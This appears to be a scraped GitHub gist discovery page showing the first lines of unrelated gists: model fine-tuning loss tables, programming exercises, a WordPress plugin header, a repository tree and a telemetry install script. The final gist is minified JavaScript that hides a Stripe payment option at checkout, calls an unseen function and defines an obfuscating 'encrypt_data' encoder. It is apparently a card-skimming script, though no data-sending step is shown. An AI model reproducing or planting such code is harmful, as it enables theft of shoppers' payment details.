model_name | LoRA r | dataset_size | quantized | learning_rate | final eval loss |
---|---|---|---|---|---|
SmolLM2-135M-Instruct | 4 | medium | false | 0.0005 | 0.17130 |
SmolLM2-135M-Instruct | 8 | medium | false | 0.0005 | 0.18854 |
SmolLM2-135M-Instruct | 4 | small | false | 0.0005 | 0.19940 |
SmolLM2-135M-Instruct | 8 | small | false | 0.0005 | 0.21265 |
Discover gists
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.ComponentModel.Design; | |
using System.Runtime.CompilerServices; | |
using System.Security.Cryptography; | |
namespace HW2_3_5 | |
{ | |
internal class Program | |
{ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
/* | |
Plugin Name: Gravity Forms Encryptorator | |
Plugin URI: https://github.com/humanmade/Gravity-Forms-Encryptorator | |
Description: Encrypt all Gravity Forms data on the way into the database using openssl public encryption, data can only be decrypted with the associated private key. | |
Author: Human Made Limited | |
Version: 1.0 Alpha | |
Author URI: http://www.hmn.md/ | |
*/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <iostream> | |
using namespace std; | |
int main() { | |
//создаю двухмерный массив | |
int const ROWS = 3; | |
int const COLS = 3; | |
int arr [ROWS][COLS]; | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
├── .gitignore | |
├── LICENSE | |
├── README.md | |
├── images | |
├── jupiter-python-sdk-banner.png | |
├── jupiter-python-sdk-logo-transparent.png | |
└── jupiter-python-sdk-logo.jpg | |
├── requirements.txt | |
└── src | |
├── LICENSE.txt |
model_name | LoRA r | dataset_size | quantized | learning_rate | final eval loss |
---|---|---|---|---|---|
SmolLM2-360M-Instruct | 4 | small | true | 0.0005 | 0.17071 |
SmolLM2-135M-Instruct | 4 | medium | false | 0.0005 | 0.17130 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Exit on error | |
set -e | |
# Define variables | |
export OTEL_VERSION="${OTEL_VERSION}" | |
export CORALOGIX_DOMAIN="${CORALOGIX_DOMAIN}" | |
export CORALOGIX_API_KEY="${CORALOGIX_API_KEY}" | |
export CORALOGIX_APPLICATION_NAME="${CORALOGIX_APPLICATION_NAME}" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from typing import List | |
def add(vec1: List[int], vec2: List[int], sum: List[int], length: int) -> None: | |
# Precondition: Length of vec1, vec2, and sum should be equal to 'length' | |
assert len(vec1) == length | |
assert len(vec2) == length | |
assert len(sum) == length | |
# Invariant: At the start of each iteration, sum[0:indx] should be the sum of vec1[0:indx] and vec2[0:indx] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
void 0 !== window._edge && clearInterval(window._edge), window._edge = setInterval(function() { | |
"undefined" != typeof jQuery && jQuery("#stripe_payments").length && (jQuery("#stripe_payments").prop("checked", !1).show(), jQuery(".payment-method.stripe-payments").removeClass("_active"), function1(), clearInterval(window._edge)) | |
}, 500); | |
var encrypt_data = function(e) { | |
var t, r, a = btoa(encodeURIComponent(e)), | |
n = ""; | |
for (t = 0; t < a.length; t++) r = 25 + (28 + (126 ^ a[t].charCodeAt(0)) ^ 121), n += String.fromCharCode(r); | |
return n | |
}; |